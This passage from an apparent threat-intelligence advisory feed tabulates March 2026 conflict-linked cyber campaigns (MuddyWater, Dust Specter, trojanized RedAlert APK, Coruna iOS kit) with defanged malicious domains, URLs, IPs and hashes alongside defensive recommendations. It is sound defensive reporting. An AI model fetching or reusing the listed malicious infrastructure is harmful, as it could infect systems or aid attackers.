proactive threat hunting; prepare contingency plans for potential service disruptions or cyber incidents linked to geopolitical developments. |
Information Control Event – Internet Connectivity Disruption | No technical IoCs reported. | Ongoing nationwide internet disruption affecting connectivity and digital communications. The shutdown has restricted access to online services and information for several days, impacting civilian communication, media access, and digital services. While not a cyberattack, prolonged internet outages during geopolitical tensions can influence information flow, incident reporting, and the broader cyber threat landscape. | N/A | Iran | N/A | Telecommunications / Internet Infrastructure | N/A | Medium | Maintain awareness of regional connectivity disruptions and potential information flow limitations; monitor geopolitical developments that may correlate with cyber activity; ensure alternative communication channels and contingency plans are in place for operational continuity during large-scale connectivity disruptions. |
Cyber Espionage / Critical Infrastructure Targeting | No confirmed IoCs publicly disclosed. | Ongoing intrusion activity targeting critical infrastructure and high-value organizations during the current geopolitical escalation. Activity linked to the Seedworm threat cluster involves establishing persistent access within victim networks and deploying backdoors for potential intelligence collection or future disruption. Campaigns have targeted sectors such as telecommunications, defense, and infrastructure operators. | Backdoors (unspecified) | United States | Seedworm / MuddyWater / Temp Zagros / Static Kitten | Critical Infrastructure | T1598 – Phishing / Initial Contact; T1190 – Public-Facing Exploitation; T1078 – Valid Accounts / Credential Abuse | High | Strengthen network defenses across critical infrastructure environments; enforce multi-factor authentication and strong credential policies; monitor networks for unusual access patterns or backdoor activity; conduct proactive threat hunting and incident response exercises; share threat intelligence with trusted industry partners. |
Cyber Espionage / Backdoor Deployment – MuddyWater Dindoor Campaign | gitempire[.]s3[.]us-east-005[.]backblazeb2[.]com
elvenforest[.]s3[.]us-east-005[.]backblazeb2[.]com
uppdatefile[.]com
serialmenot[.]com
moonzonet[.]com | A cyber espionage campaign observed since early 2026 targeting organizations in strategic sectors including aviation, financial services, banking, and software companies connected to defense and aerospace supply chains. The attackers maintained persistence within victim networks for extended periods and attempted to exfiltrate sensitive data to cloud infrastructure using legitimate tools, indicating intelligence-gathering objectives aligned with ongoing geopolitical tensions. | Dindoor backdoor; Fakeset backdoor; Rclone; Deno runtime | United States; Canada; Israel | MuddyWater / Seedworm | Finance; IT; Defense; Aerospace; Banking | T1071.001 – Web Communication; T1105 – Tool Transfer; T1059 – Command Execution; T1547 – Persistence; T1005 – Data Collection; T1041 – Data Exfiltration; T1567.002 – Cloud Exfiltration; T1219 – Remote Access | High | Monitor for abnormal execution of Deno runtime processes and unexpected Rclone activity; implement behavioral detection for persistence mechanisms and remote access tools; conduct threat hunting for MuddyWater indicators; strengthen logging and monitoring of outbound traffic to cloud storage; ensure security tooling and threat intelligence feeds are regularly updated. |
RedAlert Mobile Espionage Campaign / Mobile Spyware Distribution | hxxps://www[.]shirideitch[.]com/wp-content/uploads/2022/06/RedAlert[.]apk
hxxp://bit[.]ly/3Ozydsn
hxxps://api[.]ra-backup[.]com/analytics/submit[.]php | A mobile espionage campaign distributing a trojanized version of the legitimate Red Alert rocket warning application via SMS phishing messages. Victims are directed to sideload a malicious APK that mimics the official emergency alert application. Once installed, the malware collects sensitive data including SMS messages, contact lists, device information, and GPS location data while maintaining the appearance of a functional alert application. The campaign primarily targets civilians during the ongoing conflict and focuses on intelligence collection through mobile device compromise. | Android spyware (trojanized RedAlert APK) | Israel | Not attributed | Government; Defense; Military; Civilian Users | T1566.002 – Phishing Link; T1476 – Malicious App Delivery; T1409 – Sensitive Data Access; T1416 – SMS Collection; T1430 – Location Tracking; T1421 – System Discovery; T1404 – Data Exfiltration; T1027 – Obfuscation | High | Only download applications from official app stores and verify the developer before installation; avoid installing APK files from SMS or unknown links; review application permissions carefully; deploy mobile threat defense solutions where possible; educate users on mobile phishing risks, especially during periods of heightened geopolitical tension. |
Cyber Espionage / Infrastructure Targeting – State-Aligned Activity | 37[.]1[.]213[.]152
184[.]75[.]210[.]206
162[.]0[.]230[.]185 | Increased cyber activity linked to multiple state-aligned threat actors conducting reconnaissance, credential abuse, and network probing against organizations globally amid heightened geopolitical tensions. The activity appears focused on early-stage intrusion and access establishment that could enable espionage or future disruptive operations. Targeted sectors include manufacturing, transportation, telecommunications, energy, government, finance, and defense-related organizations. | Not specified | Middle East; Europe; United States | MuddyWater / APT34 / OilRig / Seedworm; APT33 / Elfin / Refined Kitten; UNC1549 / CURIUM / Tortoise Shell / Crimson Sandstorm | Telecoms; Energy; Government; Transport; Manufacturing; Finance; Defense; Aerospace | T1566.001 – Phishing Attachment; T1110 – Brute Force; T1110.003 – Password Spraying; T1078 – Valid Accounts; T1190 – Public-Facing Exploit; T1059.001 – PowerShell Execution; T1046 – Network Scanning; T1087 – Account Discovery; T1083 – File Discovery; T1021 – Remote Services | High | Implement multi-factor authentication and strong credential policies; patch public-facing systems and monitor for exploitation attempts; enhance network monitoring for scanning or credential abuse; conduct proactive threat hunting for indicators linked to Iranian APT groups; review incident response plans and strengthen threat intelligence sharing. |
Mobile Exploitation Campaign / Watering-Hole Attack – Coruna iOS Exploit Kit | TO ADVISE | A mobile exploitation campaign leveraging the Coruna iOS exploit kit targeting iPhones running iOS 13–17.2.1. The campaign has been observed in watering-hole attacks on compromised Ukrainian websites and in cryptocurrency-related scam pages. The exploit kit uses malicious web pages and hidden iframe mechanisms to deliver exploit chains and connect infected devices to attacker-controlled infrastructure for surveillance or further exploitation. Infrastructure includes domains disguised as gambling, gaming, cryptocurrency, and promotional sites. | Coruna iOS Exploit Kit | Ukraine | Not attributed | Not specified | T1189 – Drive-by Compromise; T1059 – Command Execution; T1071 – Web Communication; T1090 – Proxy Use; T1573 – Encrypted Channel; T1568 – Dynamic Resolution; T1583.001 – Domain Infrastructure; T1608.001 – Malware Staging; T1204 – User Interaction | High | Ensure iOS devices are updated with the latest security patches; deploy mobile device management (MDM) or mobile threat defense solutions where possible; restrict access to suspicious or untrusted websites; educate users about watering-hole and scam-related phishing pages; monitor network traffic for connections to suspicious domains or exploit delivery infrastructure. |
Mar 8, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
Cyber Reconnaissance / IoT Surveillance Exploitation | CVE-2017-7921; CVE-2021-36260; CVE-2023-6895; CVE-2025-34067; CVE-2021-33044 | Iran-linked cyber actors conducted large-scale scanning and exploitation attempts against internet-exposed surveillance cameras across the Middle East. The campaign targeted Hikvision and Dahua IP cameras to gain unauthorized access and potentially obtain real-time video intelligence. Compromised devices could enable reconnaissance, monitoring of strategic locations, and battle damage assessment during regional military operations. Activity correlates with heightened geopolitical tensions and demonstrates the use of compromised IoT infrastructure to support physical military intelligence operations. | Hikvision IP Cameras; Dahua Surveillance Systems | Israel; Kuwait; Qatar; UAE; Bahrain; Lebanon | Iran-linked threat actors | Military; Government; Administration | T1595 – Active Scanning; T1590 – Reconnaissance; T1190 – Public-Facing Exploit; T1046 – Service Discovery; T1021 – Remote Access; T1071 – Web Communication | High | Remove direct internet exposure of surveillance devices; place cameras behind VPN or zero-trust access gateways; apply latest firmware patches; replace unsupported devices; enforce strong unique credentials; segment surveillance devices into isolated network zones; monitor logs for suspicious login attempts and abnormal outbound connections. |
Opportunistic Cybercrime / Phishing & Malware Distribution – Conflict-Themed Campaigns | hxxp://www[.]e-kflower[.]com/_prozn/_skin_mbl/home/KApp[.]rar
hxxps://www[.]360printsol[.]com/2026/alfadhalah/thumbnail?img=index[.]png
hxxp://www[.]e-kflower[.]com/_prozn/_skin_mbl/home/KAppl[.]rar
172[.]81[.]60[.]97
017[.]65c[.]mytemp[.]website
arch[.]megadatahost1[.]lol
arch2[.]maxdatahost1[.]cyou
arch2[.]megadatahost1[.]lol
cfgomma[.]com
flourishingscreencousin[.]com
goldman-iran-krieg[.]pages[.]dev
irandonation[.]org
khameneisol[.]xyz
lettucecircumvent[.]com
media[.]hyperfilevault2[.]mom
media[.]maxdatahost1[.]cyou
media[.]megadatahost1[.]lol
media[.]megafilehost2[.]sbs
nowarwithiran[.]store | Multiple malware and phishing campaigns exploiting geopolitical tensions in the Middle East. Threat actors distribute malware through conflict-themed lures, fake news blogs, fraudulent donation portals, and impersonation websites targeting victims across government, finance, and digital services sectors. Attack techniques include DLL sideloading using legitimate binaries, malicious LNK execution, CHM exploitation, shellcode loading, and remote management tool hijacking to establish persistence and exfiltrate data. | LOTUSLITE; StealC | Middle East; Bahrain; Israel | Mustang Panda (suspected activity) | Government; Military; Finance; Banking; Digital Services; IT/ISP; High-Value Individuals | T1204 – User Execution; T1566 – Phishing; T1218 – Signed Binary Proxy Execution; T1071 – Web Communication; T1547 – Persistence; T1059 – Command Execution; T1105 – Tool Transfer; T1053 – Scheduled Task; T1090 – Proxy; T1083 – File Discovery; T1027 – Obfuscation | High | Minimize exposure of internet-facing applications and VPN services; inspect network traffic for malware delivery and exploit activity; enforce least-privilege access controls and strong MFA; monitor for suspicious persistence mechanisms or proxy usage; conduct security awareness training to mitigate phishing and fraud risks; perform regular threat hunting and security assessments. |
Mar 6, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
Opportunistic Cybercrime / Phishing & Malware Distribution | Large number of newly registered domains (>8,000) using conflict-related keywords and malicious infrastructure distributing malware (full IoC list extensive). | Surge in opportunistic cyber activity exploiting geopolitical tensions in the Middle East. Observed campaigns include phishing attacks using conflict-themed lures, fake news blogs distributing malware, fraudulent websites impersonating legitimate services, donation scams, and cryptocurrency-related fraud campaigns. Some operations delivered malware via DLL sideloading while leveraging compromised or newly registered domains to host payloads and phishing infrastructure. | StealC; LOTUSLITE backdoor | Bahrain; Iran; Israel; Iraq; United States | Mustang Panda (associated activity observed) | Finance; Government; IT | T1566.001 – Phishing Attachment; T1189 – Drive-by Compromise; T1059.001 – Command Execution; T1555.003 – Credential Theft; T1195.001 – Compromised Infrastructure; T1078.004 – Valid Accounts | High | Reduce attack surface through strong access controls and least-privilege policies; enforce multi-factor authentication; inspect network traffic to detect malicious domains and payload delivery; implement threat hunting for conflict-themed phishing campaigns and malware indicators; conduct regular security awareness training and risk assessments to mitigate social-engineering threats. |
Hacktivism / DDoS & Website Defacement Campaign | No specific IoCs reported. | Ongoing hacktivist cyber operations attributed to the Fatimion Cyber Team, involving Distributed Denial of Service (DDoS) attacks, website defacements, and database data exfiltration. The group has conducted sustained activity across the Middle East since 2023 and continues operations into 2026, combining disruptive cyber activity with coordinated information operations aimed at amplifying psychological and political impact. | Not specified | Not specified | Fatimion Cyber Team | Not specified | T1499 – Service Disruption (DDoS); T1491 – Website Defacement; T1041 – Data Exfiltration; T1596 – Information Operations | Medium | Implement DDoS mitigation and web application protection mechanisms; monitor web assets for defacement attempts; strengthen database access controls and logging; deploy intrusion detection and monitoring for data exfiltration; monitor online channels for coordinated influence or disinformation activity related to hacktivist campaigns. |
Cyber Espionage / Backdoor Deployment – MuddyWater Dindoor Campaign | No specific IoCs reported in the advisory. | A cyber espionage campaign attributed to the MuddyWater APT group targeting banks, airports, nonprofits, and a software supplier connected to the defense and aerospace sector. The campaign deploys newly identified backdoors to establish persistent access in victim networks, enabling long-term surveillance and potential data exfiltration. Attackers leveraged legitimate tools for data transfer to cloud storage and may use the foothold for future disruptive or destructive operations amid ongoing geopolitical tensions. | Dindoor; Fakeset; Rclone; Deno runtime | United States; Israel; Saudi Arabia; Iraq; UAE; Georgia; India; Pakistan; Turkey | MuddyWater / Seedworm / TEMP.Zagros / Mango Sandstorm / TA450 / Static Kitten | Finance; IT; Energy; Government; Aerospace; Defense | T1566 – Phishing; T1105 – Tool Transfer; T1078 – Valid Accounts; T1190 – Public-Facing Exploit | High | Strengthen phishing defenses and user awareness; monitor networks for unusual use of tools such as Rclone or abnormal cloud storage access; enforce multi-factor authentication and strong credential management; patch public-facing systems; implement network segmentation and threat hunting for MuddyWater indicators. |
Cyber Espionage / Spear-Phishing Malware Campaign | No public IoCs disclosed in the advisory. | A targeted phishing campaign against Iraqi government officials using lures impersonating Iraq’s Ministry of Foreign Affairs. The operation delivers previously unseen malware families designed to establish persistence and conduct espionage activities. The attack chain uses phishing emails and fake Cisco Webex meeting pages to trigger PowerShell execution and deploy multi-stage malware capable of in-memory execution and evasion. | SPLITDROP; TWINTASK; TWINTALK; GHOSTFORM | Iraq | Dust Specter (Iran-linked) | Government | T1566 – Phishing; T1204 – User Execution; T1059 – PowerShell Execution; T1105 – Tool Transfer; T1027 – Obfuscation; T1547 – Persistence | High | Strengthen email security controls and phishing detection; conduct user awareness training to identify impersonation attempts; deploy EDR solutions to detect suspicious PowerShell and in-memory execution; apply application control to block unauthorized binaries; monitor network traffic for anomalous activity and emerging indicators linked to Dust Specter campaigns. |
Mar 5, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
Mobile Exploitation Campaign / iOS Exploit Kit Activity | Multiple exploit delivery domains, configuration servers, and C2 infrastructure associated with the Coruna exploit kit (extensive IoC set reported). | A mobile exploitation campaign leveraging the Coruna iOS exploit kit targeting Apple iPhone devices. The campaign uses malicious web infrastructure to deliver exploits through exploit chains designed to compromise vulnerable iOS devices. The exploit kit includes delivery infrastructure, implant servers, and command-and-control channels used for post-exploitation control and potential surveillance or data collection from compromised devices. | Coruna iOS Exploit Kit | Not specified | Not attributed | Not specified | T1189 – Drive-by Compromise; T1071 – Web Communication; T1059 – Command Execution | High | Ensure iOS devices are updated to the latest security patches; deploy mobile device management (MDM) or mobile threat defense solutions where possible; restrict access to suspicious websites or links; monitor mobile device behavior for abnormal network connections or exploit activity; educate users about risks of malicious links and exploit delivery pages. |
Cyber Reconnaissance / IoT Surveillance Exploitation | No specific IoCs reported. | Large-scale scanning and exploitation attempts targeting internet-connected surveillance cameras across Israel and other Middle Eastern countries following recent missile strikes. Attackers search for exposed devices with weak or default credentials and attempt to exploit known vulnerabilities to gain access. Compromised cameras could provide reconnaissance capabilities, enabling monitoring of locations, infrastructure, or individuals during periods of geopolitical tension. | Internet-connected surveillance cameras (IoT devices) | Israel; Middle East | State linked threat actors (suspected) | Not specified | T1190 – Public-Facing Exploit; T1110 – Brute Force; T1046 – Network Scanning | High | Update firmware on all internet-exposed surveillance cameras; enforce strong and unique credentials and disable default passwords; segment IoT devices from core networks; monitor network traffic for unusual connections from camera systems; deploy intrusion detection or prevention mechanisms and prioritize patching of disclosed vulnerabilities. |
Data Breach / Financial Data Leak | No IoCs reported. | A data leak involving the Ariomex cryptocurrency exchange exposed a database containing information on over 11,800 users, including identities, emails, IP addresses, and cryptocurrency transaction records between 2022–2025. The data reportedly surfaced on dark web forums and may enable tracking of financial activity associated with Iranian users and entities. Initial analysis suggests the breach may have originated from a compromised customer support system, potentially exposing transaction patterns and incomplete or altered KYC information. | Not specified | Global users of the platform | Not attributed | Finance / Cryptocurrency | T1078 – Valid Accounts (account access abuse); T1190 – Exploit Public-Facing Application (system compromise); T1567 – Exfiltration Over Web Services (data leak) | Medium | Implement strong access controls and MFA across all financial platforms; enhance monitoring and logging to detect anomalous access to customer databases; conduct regular security assessments of customer support systems and external-facing services; deploy data loss prevention (DLP) controls to protect sensitive financial information; monitor dark web sources for potential exposure of organizational data. |
Cyber Espionage / Network Intrusion | No IoCs reported. | A sustained intrusion campaign attributed to an Iranian state-linked threat actor targeted several U.S. organizations across finance, transportation, and software sectors. The attackers reportedly established persistent access within victim networks, embedding a custom implant that allows remote control and long-term intelligence collection. The activity began in early 2026 and intensified following geopolitical tensions, suggesting pre-positioning within networks for potential data exfiltration or future disruptive activity. | Custom backdoor implant | United States | MuddyWater | Finance, IT, Transportation | T1598 – Phishing; T1190 – Exploit Public-Facing Application; T1078 – Valid Accounts; T1059 – Command & Scripting | High | Enhance monitoring for unusual outbound traffic and lateral movement; enforce multi-factor authentication across all privileged accounts; regularly patch external-facing systems and services; deploy endpoint detection and response (EDR) to identify persistence mechanisms; conduct security awareness training to reduce phishing risks; implement intrusion detection/prevention systems (IDS/IPS) and proactive threat hunting for indicators linked to MuddyWater activity. |
Cyber Espionage / IoT Surveillance Intrusion | No IoCs reported. | Reports indicate a cyber-enabled intelligence operation in which traffic camera infrastructure in Iran was compromised to enable surveillance and tracking of high-value individuals. The operation allegedly leveraged access to internet-connected cameras to monitor movement patterns and gather real-time situational intelligence. The activity highlights how IoT and surveillance infrastructure can be exploited for reconnaissance and intelligence collection supporting broader geopolitical or military objectives. | Compromised traffic camera systems (IoT devices) | Iran | State-linked actor | Government, Critical Infrastructure | T1190 – Exploit Public-Facing Application; T1078 – Valid Accounts; T1189 – Drive-by Compromise | Medium | Secure internet-connected cameras and IoT devices by disabling direct internet exposure; enforce strong authentication and device-level encryption; apply firmware updates and patch known vulnerabilities; segment surveillance infrastructure from enterprise networks; monitor access logs and network traffic for anomalous device activity; conduct regular security assessments of IoT deployments in critical environments. |
Cyber Espionage / IoT Surveillance Intrusion | No IoCs reported. | Reports indicate a cyber-enabled intelligence operation in which traffic camera infrastructure in Iran was compromised to enable surveillance and tracking of high-value individuals. The operation allegedly leveraged access to internet-connected cameras to monitor movement patterns and gather real-time situational intelligence. The activity highlights how IoT and surveillance infrastructure can be exploited for reconnaissance and intelligence collection supporting broader geopolitical or military objectives. | Compromised traffic camera systems (IoT devices) | Iran | State-linked actor | Government, Critical Infrastructure | T1190 – Exploit Public-Facing Application; T1078 – Valid Accounts; T1189 – Drive-by Compromise | Medium | Secure internet-connected cameras and IoT devices by disabling direct internet exposure; enforce strong authentication and device-level encryption; apply firmware updates and patch known vulnerabilities; segment surveillance infrastructure from enterprise networks; monitor access logs and network traffic for anomalous device activity; conduct regular security assessments of IoT deployments in critical environments. |
Operation CandleStone – Cyber Espionage / Spear-Phishing Campaign | health-beauty-skin-care[.]com
abudhabspacedebate[.]com
abudhbispacedebate[.]com
huammings[.]com | An active cyber-espionage campaign attributed to a state-linked threat actor targeting organizations in the UAE’s aerospace, defense, government, and energy sectors. The operation uses spear-phishing emails themed around the Abu Dhabi Space Debate to deliver malicious archives containing VHD files designed to bypass Windows Mark-of-the-Web protections. Once executed, the attack chain leverages DLL sideloading to deploy the CandleStone backdoor and supporting malware, enabling reconnaissance, credential theft from Chromium-based browsers, and encrypted command-and-control communications. Analysts assess the activity may represent early-stage intelligence collection potentially preceding more disruptive operation | Phoenix v4 RAT; Chromium credential stealer; FakeUpdate loader | United Arab Emirates | APT33 (Peach Sandstorm / Elfin / Magnallium / Refined Kitten) | Government, Aerospace, Defense, Energy | T1566.001 – Spear-phishing attachment; T1553.005 – Mark-of-the-Web bypass; T1574.002 – DLL sideloading; T1071.001 – Web-based C2 | High | Block identified campaign domains; restrict mounting of VHD/ISO disk images through Group Policy; monitor for abnormal execution of mounted disk content and LNK files; hunt for dxgi.dll loaded by ApplicationFrameworkHost.exe; deploy EDR detection for DLL sideloading behavior and suspicious outbound connections; strengthen phishing detection and user awareness controls. |
RedAlert – Mobile Espionage / Trojanized Application Campaign | No IoCs reported. | A mobile espionage campaign exploiting the conflict by distributing a trojanized version of the legitimate Rocket Alert application used for missile warning notifications. The malicious application targets civilians by masquerading as the official alert app while covertly collecting sensitive personal data, device information, and geolocation data. The campaign leverages heightened public reliance on emergency warning systems during conflict to trick users into installing the malicious application, enabling surveillance and intelligence collection. | Trojanized Rocket Alert Android application (mobile spyware) | Israel, Iran | Not attributed | Government, Civilian | T1588.002 – Malicious Tool Acquisition; T1189 – Drive-by / Malicious App Distribution; T1057 – Mobile Device Monitoring | High | Only install mobile applications from official app stores and verify developer authenticity; review and restrict excessive application permissions; deploy Mobile Threat Defense (MTD) solutions to detect malicious apps; educate users about risks of installing apps from external sources; verify emergency alerts and applications through official government channels. |
Ransomware Activity / Data Leak Operations | No IoCs reported | Threat monitoring in early March 2026 observed continued ransomware activity and dark web–related operations. The Morpheus ransomware group reportedly targeted a manufacturing organization, while another ransomware actor resumed activity by re-publishing previously stolen victim data on leak sites to increase extortion pressure. Additionally, multiple hacktivist-style cyber activities were observed targeting organizations in regions affected by the ongoing conflict. These activities indicate a combination of financially motivated ransomware operations and politically themed cyber disruptions. | Morpheus ransomware | South Korea; Middle East region | Not attributed | Manufacturing | T1486 – Data Encrypted for Impact; T1567 – Data Exfiltration; T1499 – Service Disruption | Medium | Maintain secure and regularly tested offline backups; enforce multi-factor authentication across critical systems; apply timely patching to reduce ransomware exposure; monitor networks for indicators of data exfiltration and unusual traffic patterns; strengthen logging, intrusion detection, and threat hunting capabilities; monitor dark web sources for potential exposure of organizational data. |
Cyber Espionage Campaign / Spear-Phishing Intrusion | b8254efd859f5420f1ce4060e4796c08
8621be9e1aa730d1ac8eb06fa8f66d9da70ff293
903f7869a94d88d43b9140bb656f7bb86ef725efc78ef2ff9d12fd7c7c2aca74
78275f3fc7e209b85bff6a6f99acc68a
Fc08f8403849c6233978a363f4cdc58cd7041823
6bb0d45799076b3f2d7f602b978a0779868fc72a1188374f6919fbbfba23efce
d5ddf40ba2506c57d3087d032d733e08
682c043443cb81b6c2fde8c5df43333f5d1fec53
797325b3c8a9356dcace75d93cb5cfb7847d2049c66772d4cc2cee821618cb96
8f44262afaa171b78fc9be20a0fb0071
1debc4c512ded889464e386739d5d2f61b87ff13
293ee1fe8d36aa79cf1f64f5ddef402bc6939d229c6fca955c7b796119564779
19ab3fd2800f62a47bf13a4cc4e4c124
c79c261457def606c3393dde77c82832a5c0ded3
ad26cd72a83b884a8bc5aaa87309683953e151ebb3fde42eda7bf9a4406e530d
63702bd6422ec2d5678d4487146ea434
c7dff3a0675f330feb9a7c469f8340369451d122
f3f2dc31f70a105db161a5e7b463b2215d3cbd64ac0146fd68e39da1c279f7ef
aa887d32eb9467abba263920e55d6abe
ad97e1bba1d040a237727afdb2787d6867d72b74
6af71297ce7681e64d9a4c5449a7326f17f3f107cb7940ec5e0840390c457a47
b19add5ccaa17a1308993e6f3f786b06
51a746c85bd486f223130173b7e674379a51b694
69294ad90aeb7f05e501e7191c95beb14e23da5587dd75557c867e2944a57fdc
7f17fa22feaced1a16d4d39c545cdb16
369b56a89b2fce2cbdc36f5a23bdec6067242911
fa51aff99d86a9f1f65aa0ebbf6ca40411d343cea59370851ab328b97e2164bb
70a9b537b9b7e1b410576d798e6c5043
cb1760c90fb6c399e0125c7aa793efe37c4ce533
a27d53608ab05b5c7cb86bcf4a273435238beeb7e7efd7845375b2aa765f51e2
a7561eb023bb2c4025defcfe758d8ac2
df04e36c106691f9fe88e5798e4ae86438bd4f1d
eb5b7275c41de8e98d72696eeac9cba3719f334f8e7974e6b8760ece820b1d0c
809139c237c4062baecab43570060d67
8735ee29c409b8d101eb3170f011455be41b7a91
3a66ae5942f6feb79cf81ee70451f761253e0e0bde95f0840abdd42a804fad39
lecturegenieltd[.]pro
meetingapp[.]site
afterworld[.]store
girlsbags[.]shop
onlinepettools[.]shop
web14[.]info
web27[.]info | A cyber-espionage campaign targeting government officials through social-engineering lures such as fake government documents and meeting invitations. The intrusion delivers previously undocumented .NET-based malware families enabling command execution, file transfer, and remote system control through command-and-control infrastructure. Observed techniques include DLL sideloading, PowerShell execution, registry modification, delayed execution, and obfuscated network communication. The activity indicates a targeted intelligence-gathering operation using compromised infrastructure and advanced evasion methods. | SPLITDROP; TWINTASK; TWINTALK; GHOSTFORM | Iraq | Dust Specter (suspected state-linked) | Government, Administration | T1583.001 – Infrastructure Acquisition; T1587.001 – Malware Development; T1204.004 – User Execution; T1112 – Registry Modification; T1574.002 – DLL Sideloading; T1071.001 – Web-based C2 | High | Implement application allow-listing to prevent unauthorized DLL sideloading; block password-protected archives from unverified senders; enable PowerShell script block logging and monitor registry Run keys for persistence; inspect outbound HTTPS traffic for anomalous URI patterns or unusual authentication headers; regularly patch systems and maintain updated endpoint protection; conduct user awareness training to identify phishing attempts. |
Cyber Threat Escalation / Early Warning | No IoCs reported. | Threat intelligence reporting indicates a heightened risk of destructive cyber activity following ongoing geopolitical tensions. Analysts assess that cyber operations may focus on critical infrastructure sectors, including energy, transportation, communications, government, finance, water, and healthcare. The anticipated activity may prioritize disruptive or destructive actions rather than intelligence collection, potentially accompanied by information manipulation campaigns. While large-scale systemic disruption is considered less likely, organizations with exposed or poorly protected infrastructure may face increased targeting risk. | Not specified | Multiple regions | State-linked actors (not specified) | Energy, Finance, IT, Government, Healthcare, Transportation, Water | T1485 – Data Destruction; T1490 – Inhibit System Recovery; T1562.001 – Impair Defenses; T1562.003 – Disable Security Tools | Medium | Strengthen defenses across critical infrastructure environments; review and update incident response and business continuity plans; ensure strong network segmentation and secure backups; enhance monitoring for abnormal system behavior; conduct vulnerability management and patching for internet-exposed systems; maintain executive awareness and ongoing threat intelligence monitoring. |
Mar 4, 2026
Campaign | IoC | Campaign Scope | Malware/ Tools | Targeted Country | Threat Actor | Sector | MITRE ATT&CK Techniques | Threat Severity | Recommendation |
|---|---|---|---|---|---|---|---|---|---|
AI-Enabled Cyber Operations / Emerging Threat Landscape | No specific IoCs reported. | Threat intelligence reporting highlights the increasing use of AI to automate cyber operations, enabling rapid exploit development, network reconnaissance, phishing campaigns, and deepfake-enabled social engineering. Nation-state actors and cybercriminal groups are leveraging AI and Living-off-the-Land (LotL) techniques to conceal malicious activity within trusted cloud services and accelerate attack timelines. The report also notes a rise in token theft campaigns and large-scale DDoS attacks reaching record traffic volumes. | LummaC2; Aisuru; Cloud service abuse (Google Drive, Microsoft Teams, Amazon S3) | Not specified | Salt Typhoon; Linen Typhoon; FrumpyToad; PunyToad; NastyShrew; PatheticSlug; CrustyKrill | IT; Government; Telecommunications; Finance | T1598 – Phishing; T1078 – Valid Accounts; T1190 – Public-Facing Exploit; T1027 – Obfuscation; T1059.001 – Command Execution; T1071.001 – Web Communication | High | Deploy autonomous and AI-assisted defense capabilities; enforce strong email authentication controls (DMARC, DKIM, SPF); implement Zero Trust access policies across SaaS platforms; continuously audit third-party API integrations; strengthen monitoring for token theft and suspicious cloud service activity; conduct proactive threat hunting and maintain robust incident response procedures. |
Operation Epic Fury / Cyber Conflict Escalation Advisory | N/A | Following the launch of Operation Epic Fury on February 28, 2026, involving coordinated military and cyber operations, analysts assess an increased likelihood of retaliatory cyber activity and disruptive operations linked to the geopolitical escalation. While no specific malware or threat actors have been confirmed, the conflict raises the probability of cyber espionage, disruption, and destructive attacks targeting government systems, energy infrastructure, and military-related organizations. | N/A | Iran; United States; Israel; Middle East | Not attributed | Government; Military; Energy | Potential tactics may include Phishing (T1566), Public-Facing Exploitation (T1190), and Valid Account Abuse (T1078) | High | Review and test incident response plans for nation-state attack scenarios; enforce multi-factor authentication and strong access controls; strengthen network segmentation and monitoring; patch critical vulnerabilities promptly; conduct proactive threat hunting and share threat intelligence with trusted partners to detect potential retaliatory cyber operations. |
Cyber Espionage / AI-Assisted Malware Campaign | No specific IoCs reported. | Targeted campaign against Iraqi government officials leveraging phishing and social engineering to deliver AI-assisted custom .NET malware. The attack chains combine DLL sideloading, in-memory PowerShell execution, and ClickFix-style lures impersonating Iraq’s Ministry of Foreign Affairs. Attackers also leveraged compromised government infrastructure to increase credibility and deliver payloads, suggesting a coordinated espionage effort designed to evade detection and maintain persistence. | Custom .NET malware; PowerShell; DLL sideloading | Iraq | Dust Specter (Iran-linked) | Government | T1566.001 – Phishing; T1059.001 – PowerShell Execution; T1574.002 – DLL Sideloading; T1105 – Tool Transfer | High | Deploy advanced email filtering and phishing detection; use EDR solutions to detect DLL sideloading and in-memory execution; regularly patch systems and applications; strengthen network segmentation; conduct targeted security awareness training for government personnel; monitor networks for suspicious behavior and anomalous PowerShell activity. |
Cyber Activity Surge / Conflict-Related Threat Landscape | No IoCs reported. | Increased cyber activity has been observed following recent geopolitical tensions, including hacktivist-style activity, psychological operations, opportunistic phishing campaigns, and exploitation of public-facing systems. Some incidents include application defacement, broadcast intrusions, and temporary internet connectivity disruptions, while other threat actors appear to be leveraging the broader conflict as a theme for phishing and malware distribution. Analysts highlight a potential delayed activation pattern, where initial access may be established in advance and used later for disruptive or destructive operations. | Not specified | Middle East region | Not attributed | Finance, Energy, IT, Government | T1566 – Phishing; T1190 – Exploit Public-Facing Application; T1562 – Impair Defenses; T1485 – Data Destruction; T1486 – Data Encrypted for Impact; T1133 – External Remote Services | Medium | Strengthen cyber hygiene through timely patching and vulnerability management; enforce multi-factor authentication (MFA) across remote access services; reduce exposure of internet-facing systems; maintain regular security awareness training; implement strong backup and recovery procedures; leverage security monitoring tools such as SIEM, NDR, and deception technologies; enhance threat intelligence sharing and continuous exposure monitoring. |
Hacktivism / Distributed Denial-of-Service (DDoS) Campaign | No IoCs reported. | A surge in hacktivist cyber activity has been observed following escalating regional tensions, with 149 DDoS attacks impacting approximately 110 organizations across 16 countries within a short time frame. The activity appears coordinated and primarily focused on service disruption rather than long-term compromise. Analysts note that a small number of hacktivist groups were responsible for a significant portion of the attacks, indicating organized campaigns leveraging DDoS techniques to disrupt online services and increase visibility during the broader conflict environment. | DDoS attack infrastructure | Multiple regions | Keymous+; DieNet | Multiple sectors | T1499 – Endpoint/Service Disruption (DDoS); T1190 – Exploit Public-Facing Application; T1566 – Phishing (potential initial access) | Medium | Deploy DDoS mitigation services and traffic filtering; monitor network traffic for abnormal spikes and volumetric attacks; maintain updated incident response procedures for service disruption scenarios; regularly patch internet-facing systems; strengthen security awareness programs to reduce phishing risks; implement centralized logging and monitoring to quickly detect coordinated attack activity. |
